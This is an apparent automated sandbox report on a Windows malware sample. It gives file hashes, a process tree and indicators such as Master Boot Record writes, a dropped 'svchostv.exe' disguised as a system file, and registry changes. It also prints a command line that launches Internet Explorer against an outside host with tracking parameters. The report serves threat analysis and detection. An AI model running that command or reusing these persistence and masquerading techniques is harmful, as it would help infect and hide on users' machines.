Analysis
-
max time kernel
158s -
max time network
163s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
07-12-2022 00:21
Behavioral task
behavioral1
Sample
cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe
Resource
win10v2004-20220812-en
General
-
Target
cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe
-
Size
43KB
-
MD5
5aaacfe6da605b9f485db74a942b1a39
-
SHA1
65cf036cddce15505bc80439ac5a1fc1b7ba0a71
-
SHA256
cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc
-
SHA512
3d62a5eb089b87faf80c35fc5529cea9f20c2f12b003939a183b433ff3c788a9fc59123317c4717a4adcaf2b4e8c73fe71194fa62ce0e2cb2070076c1c6bdea8
-
SSDEEP
768:GVIBjr+Fhvd8lTadCnY3Yb87lNmq/kXuzo/0Jl11qZuk66XmXHt:Xhr+FhF8ZFYIGgVXXO14Z566XmXHt
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2980 svchostv.exe -
resource yara_rule behavioral2/memory/4892-132-0x0000000000400000-0x000000000041F000-memory.dmp upx behavioral2/files/0x0007000000022f48-136.dat upx behavioral2/files/0x0007000000022f48-137.dat upx behavioral2/memory/2980-140-0x0000000000400000-0x000000000041F000-memory.dmp upx behavioral2/memory/4892-161-0x0000000000400000-0x000000000041F000-memory.dmp upx behavioral2/memory/4892-185-0x0000000000400000-0x000000000041F000-memory.dmp upx behavioral2/memory/2980-187-0x0000000000400000-0x000000000041F000-memory.dmp upx -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\svchostv.exe cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe File opened for modification C:\Windows\svchostv.exe cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "812371143" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d12ab23a489a6046b551b0a6804bdf990000000002000000000010660000000100002000000051477b3036cc7bde40afc29e4ca8205e29abf72196b75b45b97a0fa11dabb0bf000000000e8000000002000020000000a467f4d4a478e1758904e425b868f7215ff45f8dd6c0d9cadead4eb02690c837200000009326fe213307a6d046e517ba4ee8d01bd1faa875458ba2626b8bdfcf9d200b3740000000cf4b39a88ac7c92cf844748062a587810236529b1e52c126662af839424511c4de4b18ef697d05ee5e68d22c9d347579c660ebf7b2304fc0d89ae075d67edabb iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 502960358b0dd901 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50d1c1358b0dd901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "704715740" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31001995" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31001995" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "377546887" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{52C2C338-797E-11ED-AECB-E23A5D90AA50} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "704715740" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31001995" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d12ab23a489a6046b551b0a6804bdf990000000002000000000010660000000100002000000048657335ae787fa4f611a0fef2ceec5e71098b292da05bfb9bf773ee8591e2b0000000000e80000000020000200000000c3d21b6967f37ecc6af1518506cf86786afbe0bfec5c9d5cec89e3f81fd9d8320000000f642c78c659cf7b6ad3dfda4f1b3c3dee8796b83d4590d934078dd4fe7abec06400000004762e1bd4e457685b00ae7bf7a088f225b1d1d797a03a3df9e19500b326933d58bf67ed987bf5f44246ac09130a3f90f88b1ae4c2974faca3fbd277fb12ad4b5 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4892 cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe 4892 cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4904 iexplore.exe 2980 svchostv.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 4892 cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe 2980 svchostv.exe 4904 iexplore.exe 4904 iexplore.exe 4456 IEXPLORE.EXE 4456 IEXPLORE.EXE 4456 IEXPLORE.EXE 4456 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4892 wrote to memory of 2980 4892 cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe 80 PID 4892 wrote to memory of 2980 4892 cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe 80 PID 4892 wrote to memory of 2980 4892 cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe 80 PID 4892 wrote to memory of 4904 4892 cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe 81 PID 4892 wrote to memory of 4904 4892 cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe 81 PID 4904 wrote to memory of 4456 4904 iexplore.exe 82 PID 4904 wrote to memory of 4456 4904 iexplore.exe 82 PID 4904 wrote to memory of 4456 4904 iexplore.exe 82
Processes
-
C:\Users\Admin\AppData\Local\Temp\cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe"C:\Users\Admin\AppData\Local\Temp\cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\svchostv.exeC:\Windows\svchostv.exe auto2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2980
-
-
C:\progra~1\Intern~1\iexplore.exeC:\\progra~1\\Intern~1\\iexplore.exe http://sm8w.com/AddSetup.asp?id=666&localID=QM00013&isqq=3&Code=73706D73736D70727070627478727678777A6212F&ProcCount=812⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4904 CREDAT:17410 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4456
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize471B
MD58b90c80540ac0b7f86a00f00c7adb0e5
SHA1a83d1a28ce3a71303dc0eb7359182812d74539c8
SHA25647d6c62ae69a38a716da5db2d4b4c95193dc1dcbebef3c55dea8c0cfb13ea256
SHA512546494549dbf6e3c8fc547c3269a3564c6ba6e34ba66df238f31f6b53a35f9b46f5973deb38c7a686ee89b484b95cb0be1c4b49b5c771d38d80d42eb66885cd3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize434B
MD5758282b6d7f81aee6e20bfb6502c6ec4
SHA10d61194a7c325a704693db9eb9f1233ede33acc4
SHA256b44f2008c0535e206302a9981e4fb0f890929cc4587ecc8a4fb0afe527c9b79f
SHA512d2dea2cc6def07e08e17f6e362c1acd45ace2f336c139c1ae64db839a3d1c9ed49803a56bcd5aa550febd57c449fa5df0f5a96a9d765643468814ad214927b0b
-
Filesize
43KB
MD55aaacfe6da605b9f485db74a942b1a39
SHA165cf036cddce15505bc80439ac5a1fc1b7ba0a71
SHA256cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc
SHA5123d62a5eb089b87faf80c35fc5529cea9f20c2f12b003939a183b433ff3c788a9fc59123317c4717a4adcaf2b4e8c73fe71194fa62ce0e2cb2070076c1c6bdea8
-
Filesize
43KB
MD55aaacfe6da605b9f485db74a942b1a39
SHA165cf036cddce15505bc80439ac5a1fc1b7ba0a71
SHA256cc7189a6afddcff29fd38b565550d1a4c6842f2d2f69c16d3d80d7bb41628bdc
SHA5123d62a5eb089b87faf80c35fc5529cea9f20c2f12b003939a183b433ff3c788a9fc59123317c4717a4adcaf2b4e8c73fe71194fa62ce0e2cb2070076c1c6bdea8